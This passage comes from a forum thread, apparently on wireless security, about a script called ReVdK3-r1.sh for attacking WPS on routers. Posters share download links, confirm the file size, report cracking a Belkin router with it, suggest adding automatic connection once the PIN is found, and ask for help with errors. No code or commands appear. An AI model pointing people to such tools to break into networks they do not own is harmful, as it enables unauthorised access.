    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by repzeroworld View Post
    RELEASE OF REVDK3-R1.sh

    DOWNLOAD LINK

    http://www.legittorrents.info/index....0ddb497eced5b7
    Getting a "Bad ID" error, not sure if it's just because there are no seeds or what, but just thought I'd give a heads up...

  44. #144
    Join Date
    2013-Jun
    Posts
    125
    Quote Originally Posted by soxrok2212 View Post
    Getting a "Bad ID" error, not sure if its just because there are no seeds or what but just thought I'd give a heads up...
    Thanks for the thumbs up... having issues with the link too,
    but I did manage to upload it on zippyshare.
    The link is below (do tell me if it works):

    http://www32.zippyshare.com/v/12811261/file.html

  45. #145
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    If the file is supposed to be 26.2 kB (26,158 bytes) in size, then yes, it works.

  46. #146
    Join Date
    2013-Oct
    Posts
    10
    Awesome job with ReVdK3-r1.sh.

    I was able to use it to crack my Belkin N+ router when Reaver Pro couldn't attempt not one pin.

    I posted a demonstration here for anyone interested:

    EDIT: Youtube vids not allowed.

    I think you could make the script better by including a check for gnome-terminal and an apt-get install gnome-terminal for us XFCE fans.
    Also, it would be cool if the script connected to the WPS-protected AP as soon as it found the pin. (Have it send an email when done.)

    Regards,
    Last edited by sickn3ss; 2014-07-06 at 13:20.

  47. #147
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    *Post Deleted* Wrong thread, moved to Belkin Mac Address/SSID Correlation.
    Last edited by soxrok2212; 2014-07-03 at 16:34.

  48. #148
    Join Date
    2014-Jul
    Posts
    1
    Very interesting...

  49. #149
    Join Date
    2014-Jul
    Posts
    2
    Hi, I have a problem with the script. After running it, it asks me to enter wlan0; after that, the script starts but it returns this error. I am running the script with sudo, if that's important. What can the problem be?

    I forgot to enter the pic; I ask the moderator to join my two posts, thank you.
    Last edited by bolexxx; 2014-07-06 at 13:27.

  50. #150
    Join Date
    2014-Jul
    Posts
    2
    Downloads for useful programs: I will do my best to keep these updated

    Atrophy

    ReVdk3-r1

    FrankenScript 2

    Hey, can anyone give me a hint of what this little trio is about please? Thank you very much and have a nice day.
